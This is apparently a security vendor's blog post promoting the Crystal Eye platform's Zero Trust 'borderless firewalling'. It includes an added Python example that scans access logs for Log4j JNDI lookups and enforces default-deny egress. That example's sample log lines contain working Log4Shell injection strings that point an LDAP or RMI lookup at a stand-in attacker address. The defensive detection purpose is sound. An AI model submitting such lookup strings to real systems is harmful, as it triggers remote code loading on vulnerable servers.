Borderless Firewalling

Today’s networks are increasingly abstracted from the fibre and copper they run on. What constitutes a corporate network is no longer the buildings it resides in, nor the number of remote workers that connect daily. Network traffic is evolving to be processed as a streaming workflow, and any given activity has numerous tributaries that flow along ever more complex pathways. Microservices, for example, are software functions that aggregate to form the service presented to the user. What looks like old code is in fact many different components working from outside the traditional network perimeter. What was once a picture of a Medieval castle, with workers coming and going through gatehouses, has merged into a surrealist overlay of bodies and places. The problem this presents is not that there is too much information to decode the traffic; the problem is that the traffic has different modes in which it can traverse a network. Linear rules that determine who-goes-there can’t keep pace with the great many assassins in shepherd’s clothing.

So, as perimeter-based security loses its value, a new geography of Zero Trust emerges. Ingress from anywhere, and egress to anywhere, passes through this space, which is a security-defined control plane abstracted from network traffic. Filtering at the perimeter now involves algorithms that oversee a lake of data. This way, policy administration is brought as close to the action as possible. With Crystal Eye (CE) solutions, workflow is traced, marked and checked against entity behaviour analytics, the integrated risk registry and policies, as well as dynamic policy resulting from threat intelligence. At the data plane, over thirty-two hundred protocols can be processed out-of-the-box, while customisable protocol parsing supports bespoke Industrial Control Systems (ICS), including SCADA, and other IoT devices. This gives granular yet contextual control over authentication and authorisation, so that both human and non-human subjects receive least privilege on a per-transaction basis.

Borderless Firewalling, then, takes place at enforcement points, whether clients or servers, network gateways, or cloud brokering points. The CE Attack Surface Reduction app (CEASR) is an example of a host-based point at which Zero Trust policy is enforced, while the CE XDR Security Platform extends firewalling to on-premises gateways, cloud-native gateways, and brokering points. Network segmentation also creates enforcement points between zones, and when these are interconnected by an SD-WAN, the use of new protocols like WireGuard as a Software Defined Perimeter (SDP) controller gives hybrid architectures access to brokered resources rather than directly joining networks. Without embracing the Zero Trust paradigm, Next-Generation firewalls are as dead as disco. Many require add-ons to do so, but as a module within the Security Platform, the CE firewall achieves borderless latitude outright with its proprietary UCMI technology; policy enforcement, the act of firewalling, will need to keep reaching around more and more corners.

Meanwhile, wayward activities within the data lake are what attract alerts, as coastguard-like policy administration inspects the session-specific tokens permitting passage. The wrong payload, flag, or heading will impound traffic at an enforcement point. With the appropriate Security Platform, vulnerabilities like Log4j are not as easily exploited. Injected JNDI lookups would never reach attacker-controlled servers to retrieve malicious subroutines. What would otherwise have been a trusted service can no longer further the installation and backdoor phases of the kill chain.
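As an added example, not from the original page nor from Red Piranha's products, the Python below shows the two defensive checks the paragraph describes: spotting a JNDI lookup string in web access logs, and a default-deny egress policy at an application-zone enforcement point that drops the LDAP or RMI callback such a lookup would trigger. The log lines, zone addresses and allow-list are constructed for illustration (203.0.113.7 is a documentation address standing in for an attacker-controlled server).

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page). The second carries a
# JNDI lookup string in the User-Agent field; the third carries the same kind of
# lookup percent-encoded. 203.0.113.7 is a documentation address.
ACCESS_LOG = [
    '10.0.1.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "Mozilla/5.0"',
    '10.0.1.10 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 311 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.1.11 - - [10/Dec/2021:12:00:03 +0000] "GET /api/v1 HTTP/1.1" 200 88 "%24%7Bjndi%3Armi%3A%2F%2F203.0.113.7%3A1099%2Fb%7D"',
]

# Match the lookup prefix; the line is URL-decoded first so encoded variants are caught.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(lines):
    """Return (line_number, decoded_line) for every log line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, start=1):
        decoded = unquote(line)
        if JNDI_RE.search(decoded):
            hits.append((n, decoded))
    return hits


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int


# Enforcement-point policy for the application zone (assumed addresses): egress is
# default-deny, with only the database and an HTTPS update mirror allow-listed.
# The LDAP/RMI callback a JNDI lookup would make has no matching rule and is dropped.
APP_ZONE = {"10.0.1.10", "10.0.1.11"}
EGRESS_ALLOW = {("10.0.9.4", 5432), ("10.0.9.5", 443)}


def egress_decision(flow):
    """Decide whether an outbound flow from the app zone is allowed, denied or not covered."""
    if flow.src not in APP_ZONE:
        return "not-in-scope"
    return "allow" if (flow.dst, flow.dport) in EGRESS_ALLOW else "deny"


if __name__ == "__main__":
    for n, line in find_jndi_lookups(ACCESS_LOG):
        print(f"line {n}: JNDI lookup detected -> {line}")
    for f in (Flow("10.0.1.10", "203.0.113.7", 1389), Flow("10.0.1.10", "10.0.9.4", 5432)):
        print(f, egress_decision(f))
```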

The challenges of detecting incursions, though, are what they have always been. Logs and traffic can still be disguised, which is why the extended detection inputs that form a policy engine must be unified. Red Piranha’s proprietary UCMI policy controller achieves this as the central hub that correlates forensic evidence ingested by continuous diagnostics systems. Indicators of Compromise (IOCs) are analysed against Tactics, Techniques, and Procedures (TTPs), as well as User and Entity Behaviour Analytics (UEBA), to produce a complex security mesh that tracks distributed workflow. What this means is that checks and balances are applied to the bureaucracy that is the network-aware systems of today.

As a fundamental function of this apparatus, Remote Procedure Calls (RPCs) follow protocols that facilitate the execution of routines on remote systems. Yet these requests between machines are effectively disguised by stub compilers that unpackage the arguments parsed by the remote system. That system is then unaware of the origin and logs the activity as its own. This missing trace at endpoints is compounded when RPC calls are hidden within the payload of other protocols, like named pipes that carry common traffic, or are obfuscated and delivered out of order. So, to catch this activity, multiple points of detection are required. Verifying identity and access becomes more about whether the activity is typical and what supports that conclusion. Activity is checked against known techniques, as well as indicators like compromised addresses, domains and file hashes. Correlation occurs across the entire lake of activity and not just what is evident in a single transaction.

Spotting calls to ransomware command servers prevents the malware from obtaining the private keys it needs to hold data hostage. But when private keys are symmetrically encrypted and smuggled in with the original delivery, Zero Trust must be applied to prevent lateral movement and privilege escalation spreading from within. This can be implemented with Crystal Eye’s advanced firewall capabilities, using UCMI with hosts and zones linked to end users. Halting incursions at that initial attack vector is crucial to countermeasures in an open field ungoverned by perimeter rules. The ability to materialise at key locations is Borderless Firewalling. This requires continuous detection across the entire lake of data, extending to the entire security mesh. With the CE XDR Security Platform and smart SOC (SOC as a service) in place, the necessary intelligence can be passed to the CE firewall at wire speed, turning a lowly grunt in the hierarchy of threat detection into that unsung responder who saves the day.

Date Published
February 28, 2022